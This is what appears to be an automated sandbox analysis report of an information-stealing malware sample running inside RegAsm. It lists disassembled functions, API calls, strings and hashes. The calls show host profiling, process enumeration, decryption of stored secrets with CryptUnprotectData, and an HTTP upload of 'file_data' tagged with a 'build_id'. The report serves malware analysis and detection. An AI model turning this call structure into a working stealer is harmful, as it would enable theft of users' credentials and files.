                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                    • String ID: /
                                                                                    • API String ID: 2868853201-4001269591
                                                                                    • Opcode ID: 2eab95dacd1e64dbfb91623fc5bd3e6636dc749e560b48b740839b7e56384bd9
                                                                                    • Instruction ID: 9e35c1e063a1b5006514c6e45779cb792778230f9907b47db8c95fc1ce32a63e
                                                                                    • Opcode Fuzzy Hash: 2eab95dacd1e64dbfb91623fc5bd3e6636dc749e560b48b740839b7e56384bd9
                                                                                    • Instruction Fuzzy Hash: 5831EDB1901119EFDB10EFE5D885AEEB7B9EF48304F54407EE509B3681C7785A88CB64
                                                                                    Function 004106C4 Relevance: 9.1, APIs: 6, Instructions: 67commemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004106C9
                                                                                    • CoCreateInstance.OLE32(00426D04,00000000,00000001,00426430,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                    • SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                    • _wtoi64.MSVCRT ref: 00410738
                                                                                    • SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: String$Free$AllocCreateH_prologInstance_wtoi64
                                                                                    • String ID:
                                                                                    • API String ID: 1816492551-0
                                                                                    • Opcode ID: 5750feebd910b0a32989819942fd3773d09ff2150041d9a27e94e8ef07c9ed3d
                                                                                    • Instruction ID: 59f670c4249691ef4ccd63b580fd690aab74e6bff6ef209727d5cda1ca9931c7
                                                                                    • Opcode Fuzzy Hash: 5750feebd910b0a32989819942fd3773d09ff2150041d9a27e94e8ef07c9ed3d
                                                                                    • Instruction Fuzzy Hash: ED21A571A00109AFCB00DFA4DD889EE7BB5FF88304B60846EF515E7250C7B59D85CB64
                                                                                    Function 004111BE Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004111C3
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111E9
                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004111F9
                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0041120B
                                                                                    • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041121F
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411232
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 186290926-0
                                                                                    • Opcode ID: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                    • Instruction ID: 368edb313bfa2f31f76f5ba6fbd020b911e3fe3703e22c74ac1c99050383bae8
                                                                                    • Opcode Fuzzy Hash: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                    • Instruction Fuzzy Hash: 56015A71900028AFDB119F95DD48ADEBBB9EF86300F204096F505F2220D7788F84CFA5
                                                                                    Function 0040FC92 Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                    • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                    • wsprintfA.USER32 ref: 0040FCD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 362916592-0
                                                                                    • Opcode ID: 8433f4d383a38eb6f244c74d11323a05115bf9a3e49eb4d70838d4eb9b5bf1c5
                                                                                    • Instruction ID: 6938abab0ccb62d13e48435ff1e3c4824b48db837a677b598a72c4a0a60eb356
                                                                                    • Opcode Fuzzy Hash: 8433f4d383a38eb6f244c74d11323a05115bf9a3e49eb4d70838d4eb9b5bf1c5
                                                                                    • Instruction Fuzzy Hash: 28E09271704234FBEB1067A8AC0EF873A6EAB06725F111262FA16D21D0E6B4990487E5
                                                                                    Function 004062A5 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                    • LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                    • LocalFree.KERNEL32(?), ref: 004062FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 2068576380-0
                                                                                    • Opcode ID: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                    • Instruction ID: e950b9794f619c2f14945d92c2c82b9cfbc0e84929ee7baf067997c9d55b3a17
                                                                                    • Opcode Fuzzy Hash: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                    • Instruction Fuzzy Hash: 38011D7A900218AFDB01EFE8DC849DEBBBDFF48700B10046AFA42E7250D6759950CB50
                                                                                    Function 0040FBCB Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                                    • GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocNameProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 1206570057-0
                                                                                    • Opcode ID: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                                    • Instruction ID: 717baa134c2685402ab052e767e48c87ea90d479ce835390d18d57d128390497
                                                                                    • Opcode Fuzzy Hash: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                                    • Instruction Fuzzy Hash: 90D05EB6700204FBE7109BA5DE0DE9BBBBCEB84755F400166FB02D2290DAF09A05CA34
                                                                                    Function 0040FE81 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2452939696-0
                                                                                    • Opcode ID: c7e76a4fa3a2ea8111dc81b94c6d332c4cfbbd316f018eaed08d2660ea58f4df
                                                                                    • Instruction ID: b1842167c7914b1f8d9f117d359a82b64b5a8af33c7a831c26c3fc120f750992
                                                                                    • Opcode Fuzzy Hash: c7e76a4fa3a2ea8111dc81b94c6d332c4cfbbd316f018eaed08d2660ea58f4df
                                                                                    • Instruction Fuzzy Hash: A6D067B5D0011DDBCF10EBA4ED89A8977BDAB04608F4045A1AB05F2190E675A61E8BE9
                                                                                    Function 004043AD Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 764stringnetworkmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 29 4043ad-4044ac _EH_prolog call 40f95a call 403a54 call 410dac call 40fb4d lstrlenA call 40fb4d call 410dac call 40f923 * 5 StrCmpCA 52 4044ae 29->52 53 4044af-4044b4 29->53 52->53 54 4044d4-4045f4 call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40fa28 call 40fa9c call 40f9e1 call 40f98e * 3 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 53->54 55 4044b6-4044ce call 40fb4d InternetOpenA 53->55 60 404cf2-404d2f call 410a94 * 2 call 40fb14 * 4 call 40f95a 54->60 124 4045fa-40462d HttpOpenRequestA 54->124 55->54 55->60 89 404d34-404db7 call 40f98e * 9 60->89 126 404633-404635 124->126 127 404ce9-404cec InternetCloseHandle 124->127 128 404637-404647 InternetSetOptionA 126->128 129 40464d-404c3f call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4020f3 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d lstrlenA GetProcessHeap HeapAlloc call 40fb4d lstrlenA call 40fb4d memcpy call 40fb4d lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d HttpSendRequestA call 410a94 HttpQueryInfoA 126->129 127->60 128->129 334 404c41-404c4e call 40f923 129->334 335 404c53-404c65 call 410a77 129->335 334->89 340 404db8-404dc5 call 40f923 335->340 341 404c6b-404c70 335->341 340->89 343 404cac-404cc1 InternetReadFile 341->343 345 404c72-404c77 343->345 346 404cc3-404cd9 call 40fb4d StrCmpCA 343->346 345->346 347 404c79-404ca7 call 40fa9c call 40f9e1 call 40f98e 345->347 352 404ce2-404ce3 InternetCloseHandle 346->352 353 404cdb-404cdc ExitProcess 346->353 347->343 352->127
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004043B2
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                      • Part of subcall function 00410DAC: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                      • Part of subcall function 00410DAC: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                      • Part of subcall function 00410DAC: HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A40,00000000,?,?,00000000), ref: 00404B42
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404B54
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00404B6D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404B7F
                                                                                    • memcpy.MSVCRT ref: 00404B92
                                                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
                                                                                    • memcpy.MSVCRT ref: 00404BB3
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404BC4
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
                                                                                    • memcpy.MSVCRT ref: 00404BEA
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
                                                                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
                                                                                    • ExitProcess.KERNEL32 ref: 00404CDC
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404CEC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                    • String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
                                                                                    • API String ID: 2658035217-3274521816
                                                                                    • Opcode ID: 55ed085d277c474f36801abdb5871a2e9711e2d2595ca9f7e5e1cdb52fd56dac
                                                                                    • Instruction ID: 11be5296a5fba78ccfa74642cc821248e7657d66928f859353594ff17aad1918
                                                                                    • Opcode Fuzzy Hash: 55ed085d277c474f36801abdb5871a2e9711e2d2595ca9f7e5e1cdb52fd56dac
                                                                                    • Instruction Fuzzy Hash: 90624EB190014DEADB11EBE0C956BEEBBB8AF18308F50417EE505735C2DA786B4CCB65
                                                                                    Function 0040BBE8 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 370stringmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 357 40bbe8-40bca7 _EH_prolog call 40f923 call 410d21 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40f95a call 40618b 380 40c0c4-40c0e8 call 40f98e call 401061 357->380 381 40bcad-40bcbc call 410d6d 357->381 381->380 387 40bcc2-40bd2f strtok_s call 40f923 * 4 GetProcessHeap HeapAlloc 381->387 397 40c00e-40c010 387->397 398 40bd34-40bd42 StrStrA 397->398 399 40c016-40c0bf lstrlenA call 40f923 call 4010b1 call 414437 call 40f98e memset call 40fb14 * 4 call 40f98e * 4 397->399 400 40bd44-40bd72 lstrlenA call 411154 call 40f9e1 call 40f98e 398->400 401 40bd77-40bd85 StrStrA 398->401 399->380 400->401 404 40bdc0-40bdce StrStrA 401->404 405 40bd87-40bdbb lstrlenA call 411154 call 40f9e1 call 40f98e 401->405 407 40bdd0-40be04 lstrlenA call 411154 call 40f9e1 call 40f98e 404->407 408 40be09-40be17 StrStrA 404->408 405->404 407->408 415 40bea2-40beb6 call 40fb4d lstrlenA 408->415 416 40be1d-40be6b lstrlenA call 411154 call 40f9e1 call 40f98e call 40fb4d call 406242 408->416 430 40bffb-40c00c strtok_s 415->430 431 40bebc-40becd call 40fb4d lstrlenA 415->431 416->415 458 40be6d-40be9d call 40f997 call 40fa9c call 40f9e1 call 40f98e 416->458 430->397 431->430 444 40bed3-40bee4 call 40fb4d lstrlenA 431->444 444->430 453 40beea-40befb call 40fb4d lstrlenA 444->453 453->430 462 40bf01-40bff6 lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 3 call 40fb4d lstrcat * 3 call 40fb4d lstrcat * 3 call 40f997 * 4 453->462 458->415 462->430
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040BBED
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
